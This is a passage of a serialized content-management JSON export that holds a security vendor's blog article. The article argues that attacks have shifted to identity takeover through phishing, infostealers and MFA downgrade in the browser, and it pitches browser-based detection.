odeType":178,"data":72991,"content":72992},{},[72993,72996,73000],{"nodeType":173,"value":650,"marks":72994,"data":72995},[],{},{"nodeType":173,"value":654,"marks":72997,"data":72999},[72998],{"type":370},{},{"nodeType":173,"value":659,"marks":73001,"data":73002},[],{},{"nodeType":178,"data":73004,"content":73005},{},[73006],{"nodeType":173,"value":666,"marks":73007,"data":73008},[],{},{"nodeType":178,"data":73010,"content":73011},{},[73012,73015],{"nodeType":173,"value":673,"marks":73013,"data":73014},[],{},{"nodeType":173,"value":677,"marks":73016,"data":73018},[73017],{"type":370},{},{"nodeType":312,"data":73020,"content":73023},{"target":73021},{"sys":73022},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":73025,"content":73026},{},[],{"nodeType":169,"data":73028,"content":73029},{},[73030],{"nodeType":173,"value":694,"marks":73031,"data":73033},[73032],{"type":370},{},{"nodeType":235,"data":73035,"content":73036},{},[73037],{"nodeType":173,"value":702,"marks":73038,"data":73040},[73039],{"type":370},{},{"nodeType":312,"data":73042,"content":73045},{"target":73043},{"sys":73044},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":73047,"content":73048},{},[73049],{"nodeType":173,"value":716,"marks":73050,"data":73053},[73051,73052],{"type":370},{"type":194},{},{"nodeType":178,"data":73055,"content":73056},{},[73057,73060,73067],{"nodeType":173,"value":725,"marks":73058,"data":73059},[],{},{"nodeType":186,"data":73061,"content":73062},{"uri":730},[73063],{"nodeType":173,"value":733,"marks":73064,"data":73066},[73065],{"type":194},{},{"nodeType":173,"value":738,"marks":73068,"data":73069},[],{},{"nodeType":178,"data":73071,"content":73072},{},[73073],{"nodeType":173,"value":745,"marks":73074,"data":73077},[73075,73076],{"type":370},{"type":194},{},{"nodeType":178,"data":73079,"content":73080},{},[73081],{"nodeType":173,"value":754,"marks":73082,"data":73083},[],{},{"nodeType":178,"data":73085,"content":73086},{},[73087],{"nodeType":173,"value":761,"marks":73088,"data":73091},[73089,73090],{"type":370},{"type":194},{},{"nodeType":178,"data":73093,"content":73094},{},[73095,73098,73104],{"nodeType":173,"value":770,"marks":73096,"data":73097},[],{},{"nodeType":186,"data":73099,"content":73100},{"uri":775},[73101],{"nodeType":173,"value":778,"marks":73102,"data":73103},[],{},{"nodeType":173,"value":782,"marks":73105,"data":73106},[],{},{"nodeType":178,"data":73108,"content":73109},{},[73110],{"nodeType":173,"value":789,"marks":73111,"data":73114},[73112,73113],{"type":370},{"type":194},{},{"nodeType":178,"data":73116,"content":73117},{},[73118],{"nodeType":173,"value":798,"marks":73119,"data":73120},[],{},{"nodeType":178,"data":73122,"content":73123},{},[73124],{"nodeType":173,"value":805,"marks":73125,"data":73128},[73126,73127],{"type":370},{"type":194},{},{"nodeType":178,"data":73130,"content":73131},{},[73132,73135,73142,73145,73152],{"nodeType":173,"value":814,"marks":73133,"data":73134},[],{},{"nodeType":186,"data":73136,"content":73137},{"uri":819},[73138],{"nodeType":173,"value":822,"marks":73139,"data":73141},[73140],{"type":194},{},{"nodeType":173,"value":827,"marks":73143,"data":73144},[],{},{"nodeType":186,"data":73146,"content":73147},{"uri":832},[73148],{"nodeType":173,"value":835,"marks":73149,"data":73151},[73150],{"type":194},{},{"nodeType":173,"value":840,"marks":73153,"data":73154},[],{},{"nodeType":178,"data":73156,"content":73157},{},[73158],{"nodeType":173,"value":847,"marks":73159,"data":73162},[73160,73161],{"type":370},{"type":194},{},{"nodeType":178,"data":73164,"content":73165},{},[73166],{"nodeType":173,"value":856,"marks":73167,"data":73168},[],{},{"nodeType":178,"data":73170,"content":73171},{},[73172],{"nodeType":173,"value":863,"marks":73173,"data":73176},[73174,73175],{"type":370},{"type":194},{},{"nodeType":178,"data":73178,"content":73179},{},[73180,73183,73190],{"nodeType":173,"value":872,"marks":73181,"data":73182},[],{},{"nodeType":186,"data":73184,"content":73185},{"uri":832},[73186],{"nodeType":173,"value":835,"marks":73187,"data":73189},[73188],{"type":194},{},{"nodeType":173,"value":883,"marks":73191,"data":73192},[],{},{"nodeType":312,"data":73194,"content":73197},{"target":73195},{"sys":73196},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":73199,"content":73200},{},[73201],{"nodeType":173,"value":896,"marks":73202,"data":73205},[73203,73204],{"type":370},{"type":194},{},{"nodeType":178,"data":73207,"content":73208},{},[73209],{"nodeType":173,"value":905,"marks":73210,"data":73211},[],{},{"nodeType":178,"data":73213,"content":73214},{},[73215],{"nodeType":173,"value":912,"marks":73216,"data":73219},[73217,73218],{"type":370},{"type":194},{},{"nodeType":178,"data":73221,"content":73222},{},[73223,73226,73232,73235,73241,73244,73250],{"nodeType":173,"value":921,"marks":73224,"data":73225},[],{},{"nodeType":186,"data":73227,"content":73228},{"uri":926},[73229],{"nodeType":173,"value":929,"marks":73230,"data":73231},[],{},{"nodeType":173,"value":933,"marks":73233,"data":73234},[],{},{"nodeType":186,"data":73236,"content":73237},{"uri":938},[73238],{"nodeType":173,"value":941,"marks":73239,"data":73240},[],{},{"nodeType":173,"value":945,"marks":73242,"data":73243},[],{},{"nodeType":186,"data":73245,"content":73246},{"uri":950},[73247],{"nodeType":173,"value":953,"marks":73248,"data":73249},[],{},{"nodeType":173,"value":957,"marks":73251,"data":73252},[],{},{"nodeType":231,"data":73254,"content":73255},{},[],{"nodeType":235,"data":73257,"content":73258},{},[73259],{"nodeType":173,"value":967,"marks":73260,"data":73262},[73261],{"type":370},{},{"nodeType":178,"data":73264,"content":73265},{},[73266],{"nodeType":173,"value":975,"marks":73267,"data":73270},[73268,73269],{"type":370},{"type":194},{},{"nodeType":178,"data":73272,"content":73273},{},[73274,73277,73284],{"nodeType":173,"value":984,"marks":73275,"data":73276},[],{},{"nodeType":186,"data":73278,"content":73279},{"uri":989},[73280],{"nodeType":173,"value":992,"marks":73281,"data":73283},[73282],{"type":194},{},{"nodeType":173,"value":997,"marks":73285,"data":73286},[],{},{"nodeType":178,"data":73288,"content":73289},{},[73290],{"nodeType":173,"value":1004,"marks":73291,"data":73294},[73292,73293],{"type":370},{"type":194},{},{"nodeType":178,"data":73296,"content":73297},{},[73298],{"nodeType":173,"value":1013,"marks":73299,"data":73300},[],{},{"nodeType":178,"data":73302,"content":73303},{},[73304],{"nodeType":173,"value":1020,"marks":73305,"data":73308},[73306,73307],{"type":370},{"type":194},{},{"nodeType":178,"data":73310,"content":73311},{},[73312,73315,73322,73325,73332],{"nodeType":173,"value":1029,"marks":73313,"data":73314},[],{},{"nodeType":186,"data":73316,"content":73317},{"uri":1034},[73318],{"nodeType":173,"value":1037,"marks":73319,"data":73321},[73320],{"type":194},{},{"nodeType":173,"value":1042,"marks":73323,"data":73324},[],{},{"nodeType":186,"data":73326,"content":73327},{"uri":1047},[73328],{"nodeType":173,"value":1050,"marks":73329,"data":73331},[73330],{"type":194},{},{"nodeType":173,"value":1055,"marks":73333,"data":73334},[],{},{"nodeType":312,"data":73336,"content":73339},{"target":73337},{"sys":73338},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":73341,"content":73342},{},[73343],{"nodeType":173,"value":1068,"marks":73344,"data":73347},[73345,73346],{"type":370},{"type":194},{},{"nodeType":178,"data":73349,"content":73350},{},[73351],{"nodeType":173,"value":1077,"marks":73352,"data":73353},[],{},{"nodeType":312,"data":73355,"content":73358},{"target":73356},{"sys":73357},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":73360,"content":73361},{},[],{"nodeType":235,"data":73363,"content":73364},{},[73365],{"nodeType":173,"value":1093,"marks":73366,"data":73368},[73367],{"type":370},{},{"nodeType":178,"data":73370,"content":73371},{},[73372],{"nodeType":173,"value":1101,"marks":73373,"data":73376},[73374,73375],{"type":370},{"type":194},{},{"nodeType":178,"data":73378,"content":73379},{},[73380],{"nodeType":173,"value":1110,"marks":73381,"data":73382},[],{},{"nodeType":250,"data":73384,"content":73385},{},[73386,73399,73412],{"nodeType":254,"data":73387,"content":73388},{},[73389],{"nodeType":178,"data":73390,"content":73391},{},[73392,73396],{"nodeType":173,"value":1123,"marks":73393,"data":73395},[73394],{"type":370},{},{"nodeType":173,"value":1128,"marks":73397,"data":73398},[],{},{"nodeType":254,"data":73400,"content":73401},{},[73402],{"nodeType":178,"data":73403,"content":73404},{},[73405,73409],{"nodeType":173,"value":1138,"marks":73406,"data":73408},[73407],{"type":370},{},{"nodeType":173,"value":1143,"marks":73410,"data":73411},[],{},{"nodeType":254,"data":73413,"content":73414},{},[73415],{"nodeType":178,"data":73416,"content":73417},{},[73418,73422,73425,73431],{"nodeType":173,"value":1153,"marks":73419,"data":73421},[73420],{"type":370},{},{"nodeType":173,"value":1158,"marks":73423,"data":73424},[],{},{"nodeType":186,"data":73426,"content":73427},{"uri":1163},[73428],{"nodeType":173,"value":1166,"marks":73429,"data":73430},[],{},{"nodeType":173,"value":1170,"marks":73432,"data":73433},[],{},{"nodeType":312,"data":73435,"content":73438},{"target":73436},{"sys":73437},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":73440,"content":73441},{},[],{"nodeType":235,"data":73443,"content":73444},{},[73445],{"nodeType":173,"value":1186,"marks":73446,"data":73448},[73447],{"type":370},{},{"nodeType":178,"data":73450,"content":73451},{},[73452],{"nodeType":173,"value":1194,"marks":73453,"data":73456},[73454,73455],{"type":370},{"type":194},{},{"nodeType":178,"data":73458,"content":73459},{},[73460],{"nodeType":173,"value":1203,"marks":73461,"data":73462},[],{},{"nodeType":312,"data":73464,"content":73467},{"target":73465},{"sys":73466},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":73469,"content":73470},{},[],{"nodeType":169,"data":73472,"content":73473},{},[73474],{"nodeType":173,"value":1219,"marks":73475,"data":73477},[73476],{"type":370},{},{"nodeType":178,"data":73479,"content":73480},{},[73481],{"nodeType":173,"value":1227,"marks":73482,"data":73483},[],{},{"nodeType":178,"data":73485,"content":73486},{},[73487],{"nodeType":173,"value":1234,"marks":73488,"data":73489},[],{},{"nodeType":250,"data":73491,"content":73492},{},[73493,73512,73531],{"nodeType":254,"data":73494,"content":73495},{},[73496],{"nodeType":178,"data":73497,"content":73498},{},[73499,73502,73509],{"nodeType":173,"value":1247,"marks":73500,"data":73501},[],{},{"nodeType":186,"data":73503,"content":73504},{"uri":1252},[73505],{"nodeType":173,"value":1255,"marks":73506,"data":73508},[73507],{"type":194},{},{"nodeType":173,"value":1260,"marks":73510,"data":73511},[],{},{"nodeType":254,"data":73513,"content":73514},{},[73515],{"nodeType":178,"data":73516,"content":73517},{},[73518,73521,73528],{"nodeType":173,"value":1270,"marks":73519,"data":73520},[],{},{"nodeType":186,"data":73522,"content":73523},{"uri":1275},[73524],{"nodeType":173,"value":1278,"marks":73525,"data":73527},[73526],{"type":194},{},{"nodeType":173,"value":1260,"marks":73529,"data":73530},[],{},{"nodeType":254,"data":73532,"content":73533},{},[73534],{"nodeType":178,"data":73535,"content":73536},{},[73537,73540,73547],{"nodeType":173,"value":1292,"marks":73538,"data":73539},[],{},{"nodeType":186,"data":73541,"content":73542},{"uri":1297},[73543],{"nodeType":173,"value":1300,"marks":73544,"data":73546},[73545],{"type":194},{},{"nodeType":173,"value":1260,"marks":73548,"data":73549},[],{},{"nodeType":178,"data":73551,"content":73552},{},[73553],{"nodeType":173,"value":1311,"marks":73554,"data":73555},[],{},{"nodeType":250,"data":73557,"content":73558},{},[73559,73572,73585,73598],{"nodeType":254,"data":73560,"content":73561},{},[73562],{"nodeType":178,"data":73563,"content":73564},{},[73565,73569],{"nodeType":173,"value":1324,"marks":73566,"data":73568},[73567],{"type":370},{},{"nodeType":173,"value":1329,"marks":73570,"data":73571},[],{},{"nodeType":254,"data":73573,"content":73574},{},[73575],{"nodeType":178,"data":73576,"content":73577},{},[73578,73582],{"nodeType":173,"value":1339,"marks":73579,"data":73581},[73580],{"type":370},{},{"nodeType":173,"value":1344,"marks":73583,"data":73584},[],{},{"nodeType":254,"data":73586,"content":73587},{},[73588],{"nodeType":178,"data":73589,"content":73590},{},[73591,73595],{"nodeType":173,"value":1354,"marks":73592,"data":73594},[73593],{"type":370},{},{"nodeType":173,"value":1359,"marks":73596,"data":73597},[],{},{"nodeType":254,"data":73599,"content":73600},{},[73601],{"nodeType":178,"data":73602,"content":73603},{},[73604,73608],{"nodeType":173,"value":1369,"marks":73605,"data":73607},[73606],{"type":370},{},{"nodeType":173,"value":1374,"marks":73609,"data":73610},[],{},{"nodeType":178,"data":73612,"content":73613},{},[73614],{"nodeType":173,"value":1381,"marks":73615,"data":73616},[],{},{"nodeType":231,"data":73618,"content":73619},{},[],{"nodeType":169,"data":73621,"content":73622},{},[73623],{"nodeType":173,"value":1391,"marks":73624,"data":73626},[73625],{"type":370},{},{"nodeType":178,"data":73628,"content":73629},{},[73630],{"nodeType":173,"value":1399,"marks":73631,"data":73632},[],{},{"nodeType":178,"data":73634,"content":73635},{},[73636],{"nodeType":173,"value":1406,"marks":73637,"data":73638},[],{},{"nodeType":312,"data":73640,"content":73643},{"target":73641},{"sys":73642},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":73645,"content":73646},{},[],{"nodeType":169,"data":73648,"content":73649},{},[73650],{"nodeType":173,"value":1422,"marks":73651,"data":73653},[73652],{"type":370},{},{"nodeType":178,"data":73655,"content":73656},{},[73657],{"nodeType":173,"value":1430,"marks":73658,"data":73659},[],{},{"nodeType":178,"data":73661,"content":73662},{},[73663],{"nodeType":173,"value":1437,"marks":73664,"data":73665},[],{},{"nodeType":178,"data":73667,"content":73668},{},[73669],{"nodeType":173,"value":1444,"marks":73670,"data":73671},[],{},{"nodeType":178,"data":73673,"content":73674},{},[73675,73678,73685,73688,73695],{"nodeType":173,"value":1451,"marks":73676,"data":73677},[],{},{"nodeType":186,"data":73679,"content":73680},{"uri":1456},[73681],{"nodeType":173,"value":1459,"marks":73682,"data":73684},[73683],{"type":194},{},{"nodeType":173,"value":1464,"marks":73686,"data":73687},[],{},{"nodeType":186,"data":73689,"content":73690},{"uri":1469},[73691],{"nodeType":173,"value":1472,"marks":73692,"data":73694},[73693],{"type":194},{},{"nodeType":173,"value":1477,"marks":73696,"data":73697},[],{},{"items":73699},[73700,73702],{"sys":73701,"name":505},{"id":504},{"sys":73703,"name":509},{"id":508},{"items":73705},[73706],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":73707},{"url":1496},{"__typename":1528,"sys":73709,"content":73711,"title":74477,"synopsis":74478,"hashTags":118,"publishedDate":74479,"slug":74480,"tagsCollection":74481,"authorsCollection":74487},{"id":73710},"31m73YMGdCyqVmjHulBwER",{"json":73712},{"nodeType":165,"data":73713,"content":73714},{},[73715,73722,73755,73762,73767,73774,73806,73813,73819,73822,73830,73837,73844,73900,73918,73930,73937,73943,73946,73954,73970,73976,73983,73989,73996,74032,74037,74040,74048,74055,74062,74182,74187,74217,74224,74227,74235,74242,74249,74290,74318,74325,74401,74407,74410,74417,74424,74444,74447,74454,74461],{"nodeType":178,"data":73716,"content":73717},{},[73718],{"nodeType":173,"value":73719,"marks":73720,"data":73721},"Until recently, the cyber attacker methodology behind the biggest breaches of the last decade or so has been pretty consistent:",[],{},{"nodeType":250,"data":73723,"content":73724},{},[73725,73735,73745],{"nodeType":254,"data":73726,"content":73727},{},[73728],{"nodeType":178,"data":73729,"content":73730},{},[73731],{"nodeType":173,"value":73732,"marks":73733,"data":73734},"Compromise an endpoint via software exploit, or social engineering a user to run malware on their device; ",[],{},{"nodeType":254,"data":73736,"content":73737},{},[73738],{"nodeType":178,"data":73739,"content":73740},{},[73741],{"nodeType":173,"value":73742,"marks":73743,"data":73744},"Find ways to move laterally inside the network and compromise privileged identities;",[],{},{"nodeType":254,"data":73746,"content":73747},{},[73748],{"nodeType":178,"data":73749,"content":73750},{},[73751],{"nodeType":173,"value":73752,"marks":73753,"data":73754},"Repeat as needed until you can execute your desired attack — usually stealing data from file shares, deploying ransomware, or both. ",[],{},{"nodeType":178,"data":73756,"content":73757},{},[73758],{"nodeType":173,"value":73759,"marks":73760,"data":73761},"But attacks have fundamentally changed as networks have evolved. With the SaaS-ification of enterprise IT, core business systems aren’t locally deployed and centrally managed in the way they used to be. Instead, they’re logged into over the internet, via a web browser.",[],{},{"nodeType":312,"data":73763,"content":73766},{"target":73764},{"sys":73765},{"id":27027,"type":317,"linkType":318},[],{"nodeType":178,"data":73768,"content":73769},{},[73770],{"nodeType":173,"value":73771,"marks":73772,"data":73773},"Under the shared responsibility model, the part that’s left to the business consuming a SaaS service is mostly constrained to how they manage identities — the vehicle by which the app is accessed and used by the workforce. It’s no surprise that this has become the soft underbelly in the crosshairs of attackers. ",[],{},{"nodeType":178,"data":73775,"content":73776},{},[73777,73781,73789,73793,73802],{"nodeType":173,"value":73778,"marks":73779,"data":73780},"We’ve seen this time and again in the biggest breaches of recent years, with the highlights including the massive ",[],{},{"nodeType":186,"data":73782,"content":73783},{"uri":819},[73784],{"nodeType":173,"value":73785,"marks":73786,"data":73788},"Snowflake campaign in 2024",[73787],{"type":194},{},{"nodeType":173,"value":73790,"marks":73791,"data":73792}," and the ",[],{},{"nodeType":186,"data":73794,"content":73796},{"uri":73795},"https://pushsecurity.com/blog/key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms/",[73797],{"nodeType":173,"value":73798,"marks":73799,"data":73801},"2025 crime wave attributed to Scattered Spider",[73800],{"type":194},{},{"nodeType":173,"value":73803,"marks":73804,"data":73805},".   ",[],{},{"nodeType":178,"data":73807,"content":73808},{},[73809],{"nodeType":173,"value":73810,"marks":73811,"data":73812},"These attacks are so successful because while attackers have moved with the changes to enterprise IT, security hasn’t really kept up. ",[],{},{"nodeType":312,"data":73814,"content":73818},{"target":73815},{"sys":73816},{"id":73817,"type":317,"linkType":318},"xH0ZqgKQXCRRZGYVs6xt6",[],{"nodeType":231,"data":73820,"content":73821},{},[],{"nodeType":169,"data":73823,"content":73824},{},[73825],{"nodeType":173,"value":73826,"marks":73827,"data":73829},"The browser is the new battleground — and a security blind spot",[73828],{"type":370},{},{"nodeType":178,"data":73831,"content":73832},{},[73833],{"nodeType":173,"value":73834,"marks":73835,"data":73836},"Taking over workforce identities is the first objective for attackers looking to target an organization, and the browser is the place where the attacks against users happen. This is because it’s where these digital identities are created and used — and their credentials and sessions live. This is what the attacker wants to get their hands on. ",[],{},{"nodeType":178,"data":73838,"content":73839},{},[73840],{"nodeType":173,"value":73841,"marks":73842,"data":73843},"Stolen credentials can be used as part of targeted attacks or in broader credential stuffing (cycling known username and credential pairs against various apps and platforms), while stolen session tokens can be used to log in directly to an active session, bypassing the authentication process. ",[],{},{"nodeType":178,"data":73845,"content":73846},{},[73847,73851,73856,73859,73864,73867,73872,73875,73880,73883,73888,73892,73896],{"nodeType":173,"value":73848,"marks":73849,"data":73850},"There are a few different techniques that attackers can use to get access to these identities. Attackers harvest stolen credentials from various places — ",[],{},{"nodeType":173,"value":73852,"marks":73853,"data":73855},"data breach dumps",[73854],{"type":370},{},{"nodeType":173,"value":2936,"marks":73857,"data":73858},[],{},{"nodeType":173,"value":73860,"marks":73861,"data":73863},"mass",[73862],{"type":370},{},{"nodeType":173,"value":3107,"marks":73865,"data":73866},[],{},{"nodeType":173,"value":73868,"marks":73869,"data":73871},"credential",[73870],{"type":370},{},{"nodeType":173,"value":3107,"marks":73873,"data":73874},[],{},{"nodeType":173,"value":73876,"marks":73877,"data":73879},"phishing campaigns,",[73878],{"type":370},{},{"nodeType":173,"value":3107,"marks":73881,"data":73882},[],{},{"nodeType":173,"value":73884,"marks":73885,"data":73887},"infostealer logs",[73886],{"type":370},{},{"nodeType":173,"value":73889,"marks":73890,"data":73891},", even ",[],{},{"nodeType":173,"value":4806,"marks":73893,"data":73895},[73894],{"type":370},{},{"nodeType":173,"value":73897,"marks":73898,"data":73899}," that they’ve tricked an employee into installing. In fact, the cyber crime ecosystem itself has shifted on its axis to cater to this, with hackers specifically taking on the role of harvesting credentials and establishing account access for others to exploit. ",[],{},{"nodeType":178,"data":73901,"content":73902},{},[73903,73907,73914],{"nodeType":173,"value":73904,"marks":73905,"data":73906},"The high-profile ",[],{},{"nodeType":186,"data":73908,"content":73909},{"uri":819},[73910],{"nodeType":173,"value":27706,"marks":73911,"data":73913},[73912],{"type":194},{},{"nodeType":173,"value":73915,"marks":73916,"data":73917}," breaches in 2024 signalled a watershed moment in the shift to identity-driven breaches, where attackers logged into accounts across hundreds of customer tenants using stolen credentials. One of the primary sources of the stolen credentials used in the attacks were infostealer logs dating back to 2020 — breached passwords that hadn’t been rotated or mitigated with MFA. ",[],{},{"nodeType":178,"data":73919,"content":73920},{},[73921,73925],{"nodeType":173,"value":73922,"marks":73923,"data":73924},"Infostealers are notable because they’re an endpoint malware attack designed to harvest credentials and session tokens (often from the browser) to enable the attacker to then log into those services… through their own web browser. ",[],{},{"nodeType":173,"value":73926,"marks":73927,"data":73929},"So, even today’s endpoint attacks are seeing the attacker pivot back into the browser in order to get to identities — the key to the online apps and services where exploitable data and functionality now resides. ",[73928],{"type":370},{},{"nodeType":178,"data":73931,"content":73932},{},[73933],{"nodeType":173,"value":73934,"marks":73935,"data":73936},"The problem here is that this is a blind spot for the security tools we’re currently reliant upon — which don’t have the fine-grained visibility required. This is very similar to the challenge that the industry faced prior to the introduction of EDR in the 2010s — the main sources of data are looking from the outside-in, lacking the process-level visibility and context to be able to detect and stop attacks as they happen.",[],{},{"nodeType":312,"data":73938,"content":73942},{"target":73939},{"sys":73940},{"id":73941,"type":317,"linkType":318},"2qoMH6qCNJc7it7sTuKl4F",[],{"nodeType":231,"data":73944,"content":73945},{},[],{"nodeType":169,"data":73947,"content":73948},{},[73949],{"nodeType":173,"value":73950,"marks":73951,"data":73953},"Identity is the prize, browser is the platform — and phishing is the weapon of choice",[73952],{"type":370},{},{"nodeType":178,"data":73955,"content":73956},{},[73957,73961,73966],{"nodeType":173,"value":73958,"marks":73959,"data":73960},"But the technique that’s STILL driving the most impactful identity-driven breaches? ",[],{},{"nodeType":173,"value":73962,"marks":73963,"data":73965},"It’s phishing",[73964],{"type":370},{},{"nodeType":173,"value":73967,"marks":73968,"data":73969},". Phishing for credentials, sessions, OAuth consent, authorization codes. Phishing via email, instant messenger, social media, malicious Google ads… it all happens in, or leads to, the browser. ",[],{},{"nodeType":312,"data":73971,"content":73975},{"target":73972},{"sys":73973},{"id":73974,"type":317,"linkType":318},"6Gsd3G0sOibNxgVLimb2wV",[],{"nodeType":178,"data":73977,"content":73978},{},[73979],{"nodeType":173,"value":73980,"marks":73981,"data":73982},"And modern phishing attacks are more effective than ever. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques to block email and network security tools from intercepting them. Probably the most common example today is the use of bot protection (think CAPTCHA or Cloudflare Turnstile), using legitimate anti-spam features to block security tools. ",[],{},{"nodeType":312,"data":73984,"content":73988},{"target":73985},{"sys":73986},{"id":73987,"type":317,"linkType":318},"6M1My4lSKItu6Qdv4hO1RA",[],{"nodeType":178,"data":73990,"content":73991},{},[73992],{"nodeType":173,"value":73993,"marks":73994,"data":73995},"The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom CAPTCHA, and using runtime anti-analysis features, making them increasingly difficult to detect. The ways in which links are delivered has also increased in sophistication, with more delivery channels (as we showed above) and the use of legitimate SaaS services for camouflage. ",[],{},{"nodeType":178,"data":73997,"content":73998},{},[73999,74003,74008,74012,74017,74021,74029],{"nodeType":173,"value":74000,"marks":74001,"data":74002},"And the latest trends indicate that attackers are responding to increasingly hardened IdP/SSO configuration by exploiting alternative phishing techniques that ",[],{},{"nodeType":173,"value":74004,"marks":74005,"data":74007},"circumvent MFA and passkeys",[74006],{"type":370},{},{"nodeType":173,"value":74009,"marks":74010,"data":74011},", most commonly by ",[],{},{"nodeType":173,"value":74013,"marks":74014,"data":74016},"downgrading to a phishable backup authentication method",[74015],{"type":370},{},{"nodeType":173,"value":74018,"marks":74019,"data":74020}," — which you can see in action below, and ",[],{},{"nodeType":186,"data":74022,"content":74023},{"uri":49783},[74024],{"nodeType":173,"value":74025,"marks":74026,"data":74028},"read more about here",[74027],{"type":194},{},{"nodeType":173,"value":481,"marks":74030,"data":74031},[],{},{"nodeType":312,"data":74033,"content":74036},{"target":74034},{"sys":74035},{"id":61243,"type":317,"linkType":318},[],{"nodeType":231,"data":74038,"content":74039},{},[],{"nodeType":169,"data":74041,"content":74042},{},[74043],{"nodeType":173,"value":74044,"marks":74045,"data":74047},"Identities are the lowest-hanging fruit for attackers to aim for",[74046],{"type":370},{},{"nodeType":178,"data":74049,"content":74050},{},[74051],{"nodeType":173,"value":74052,"marks":74053,"data":74054},"The goal of the modern attacker, and the easiest way into your business’s digital environment, is to compromise identities. Whether you’re dealing with phishing attacks, malicious browser extensions, or infostealer malware, the objective remains the same — account takeover. ",[],{},{"nodeType":178,"data":74056,"content":74057},{},[74058],{"nodeType":173,"value":74059,"marks":74060,"data":74061},"Organizations are dealing with a vast and vulnerable attack surface consisting of:",[],{},{"nodeType":250,"data":74063,"content":74064},{},[74065,74086,74107,74127],{"nodeType":254,"data":74066,"content":74067},{},[74068],{"nodeType":178,"data":74069,"content":74070},{},[74071,74074,74082],{"nodeType":173,"value":37,"marks":74072,"data":74073},[],{},{"nodeType":186,"data":74075,"content":74076},{"uri":4492},[74077],{"nodeType":173,"value":74078,"marks":74079,"data":74081},"Hundreds of applications, with thousands of accounts",[74080],{"type":194},{},{"nodeType":173,"value":74083,"marks":74084,"data":74085}," spread across the app estate.",[],{},{"nodeType":254,"data":74087,"content":74088},{},[74089],{"nodeType":178,"data":74090,"content":74091},{},[74092,74096,74104],{"nodeType":173,"value":74093,"marks":74094,"data":74095},"Accounts vulnerable to MFA-bypass phishing kits, because they are using a login method that is not phishing-resistant, or because ",[],{},{"nodeType":186,"data":74097,"content":74098},{"uri":49783},[74099],{"nodeType":173,"value":74100,"marks":74101,"data":74103},"the login method can be downgraded",[74102],{"type":194},{},{"nodeType":173,"value":1477,"marks":74105,"data":74106},[],{},{"nodeType":254,"data":74108,"content":74109},{},[74110],{"nodeType":178,"data":74111,"content":74112},{},[74113,74117,74124],{"nodeType":173,"value":74114,"marks":74115,"data":74116},"Accounts with a weak, reused, or breached password and no MFA altogether (usually the result of a forgotten-about ",[],{},{"nodeType":186,"data":74118,"content":74119},{"uri":832},[74120],{"nodeType":173,"value":4519,"marks":74121,"data":74123},[74122],{"type":194},{},{"nodeType":173,"value":53584,"marks":74125,"data":74126},[],{},{"nodeType":254,"data":74128,"content":74129},{},[74130],{"nodeType":178,"data":74131,"content":74132},{},[74133,74137,74145,74148,74156,74160,74167,74170,74178],{"nodeType":173,"value":74134,"marks":74135,"data":74136},"Bypassing the authentication process entirely to evade otherwise phishing-resistant authentication methods, by abusing features like ",[],{},{"nodeType":186,"data":74138,"content":74139},{"uri":59347},[74140],{"nodeType":173,"value":74141,"marks":74142,"data":74144},"API key creation",[74143],{"type":194},{},{"nodeType":173,"value":2936,"marks":74146,"data":74147},[],{},{"nodeType":186,"data":74149,"content":74150},{"uri":61610},[74151],{"nodeType":173,"value":74152,"marks":74153,"data":74155},"app-specific passwords",[74154],{"type":194},{},{"nodeType":173,"value":74157,"marks":74158,"data":74159},", OAuth ",[],{},{"nodeType":186,"data":74161,"content":74162},{"uri":19838},[74163],{"nodeType":173,"value":8091,"marks":74164,"data":74166},[74165],{"type":194},{},{"nodeType":173,"value":2936,"marks":74168,"data":74169},[],{},{"nodeType":186,"data":74171,"content":74172},{"uri":61697},[74173],{"nodeType":173,"value":74174,"marks":74175,"data":74177},"cross-IdP impersonation",[74176],{"type":194},{},{"nodeType":173,"value":74179,"marks":74180,"data":74181},", and more.  ",[],{},{"nodeType":312,"data":74183,"content":74186},{"target":74184},{"sys":74185},{"id":27078,"type":317,"linkType":318},[],{"nodeType":178,"data":74188,"content":74189},{},[74190,74194,74202,74206,74213],{"nodeType":173,"value":74191,"marks":74192,"data":74193},"A key driver of identity vulnerability is the ",[],{},{"nodeType":186,"data":74195,"content":74196},{"uri":27564},[74197],{"nodeType":173,"value":74198,"marks":74199,"data":74201},"huge variance in the configurability of accounts per application",[74200],{"type":194},{},{"nodeType":173,"value":74203,"marks":74204,"data":74205},", with different levels of centralized visibility and security control of identities provided — for example, while one app can be locked down to only accept SSO logins via SAML and automatically remove any unused passwords, another provides no control or visibility of login method or MFA status (another big driver of the ",[],{},{"nodeType":186,"data":74207,"content":74208},{"uri":819},[74209],{"nodeType":173,"value":27706,"marks":74210,"data":74212},[74211],{"type":194},{},{"nodeType":173,"value":74214,"marks":74215,"data":74216}," breaches last year). Unfortunately, as a by-product of product-led growth and something that is compounded by every new SaaS startup that hits the market, this situation doesn’t look like it’s going to change anytime soon. ",[],{},{"nodeType":178,"data":74218,"content":74219},{},[74220],{"nodeType":173,"value":74221,"marks":74222,"data":74223},"The end result is that identities are misconfigured, invisible to the security team, and routinely exploited by commodity attacker tooling. It’s no surprise that they’re the primary target for attackers today. ",[],{},{"nodeType":231,"data":74225,"content":74226},{},[],{"nodeType":169,"data":74228,"content":74229},{},[74230],{"nodeType":173,"value":74231,"marks":74232,"data":74234},"The solution: The browser as a telemetry source and control point",[74233],{"type":370},{},{"nodeType":178,"data":74236,"content":74237},{},[74238],{"nodeType":173,"value":74239,"marks":74240,"data":74241},"Because identity attacks play out in the browser, it’s the perfect place for security teams to observe, intercept, and shut down these attacks. ",[],{},{"nodeType":178,"data":74243,"content":74244},{},[74245],{"nodeType":173,"value":74246,"marks":74247,"data":74248},"The browser has a number of advantages over the different places where identity can be observed and protected, 